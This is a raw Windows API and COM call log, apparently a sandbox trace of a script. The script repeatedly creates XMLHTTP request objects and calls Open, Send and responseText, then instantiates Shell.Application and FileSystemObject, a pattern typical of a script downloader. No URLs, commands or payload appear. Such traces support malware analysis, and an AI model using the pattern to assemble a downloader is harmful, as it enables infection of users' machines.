	[0670.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0670.623] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0670.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0670.623] longjmp () 
	[0670.623] longjmp () 
	[0670.623] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0670.623] SysStringLen (param_1=0x0) returned 0x0
	[0670.623] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0670.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0670.624] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0670.624] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0670.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0670.624] ??2@YAPEAX_K@Z () returned 0x62f330
	[0670.624] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0670.624] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0670.624] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0670.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0670.624] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0670.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0670.624] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0670.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0670.625] longjmp () 
	[0670.625] longjmp () 
	[0670.625] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0670.625] SysStringLen (param_1=0x0) returned 0x0
	[0670.625] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0670.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0670.625] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0670.625] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0670.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0670.626] ??2@YAPEAX_K@Z () returned 0x62f310
	[0670.626] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f310) 
	[0670.626] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0670.626] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0670.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0670.626] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0670.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0670.626] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0670.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0670.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0670.627] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0670.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0673.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0673.098] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0673.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0673.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0673.098] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0673.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0673.098] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0673.098] SysStringLen (param_1=0x0) returned 0x0
	[0673.099] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0673.099] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0673.099] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0673.099] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0673.099] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0673.099] ??2@YAPEAX_K@Z () returned 0x62f350
	[0673.099] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0673.099] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0673.099] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0673.099] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0673.099] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0673.099] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0673.100] SysStringLen (param_1=0x0) returned 0x0
	[0673.100] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0673.103] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0673.103] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0673.103] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0673.103] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0673.103] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0673.103] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0676.390] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0676.390] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0676.390] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0676.392] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0676.392] SysStringLen (param_1=0x0) returned 0x0
	[0676.392] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0676.392] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0676.392] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0676.392] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0676.392] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0676.392] ??2@YAPEAX_K@Z () returned 0x62f310
	[0676.393] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0676.393] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0676.393] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0676.393] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0676.393] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0676.393] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0676.393] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0676.396] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0676.396] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0676.396] SysStringLen (param_1=0x0) returned 0x0
	[0676.396] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0676.396] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0676.396] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0676.396] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0676.396] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7318) returned 0x0
	[0676.396] ??2@YAPEAX_K@Z () returned 0x62f330
	[0676.396] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7318, pUnkSite=0x62f330) 
	[0676.396] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0676.397] XMLHTTPRequest:IUnknown:Release (This=0x49c7318) returned 0x0
	[0676.397] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0676.397] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
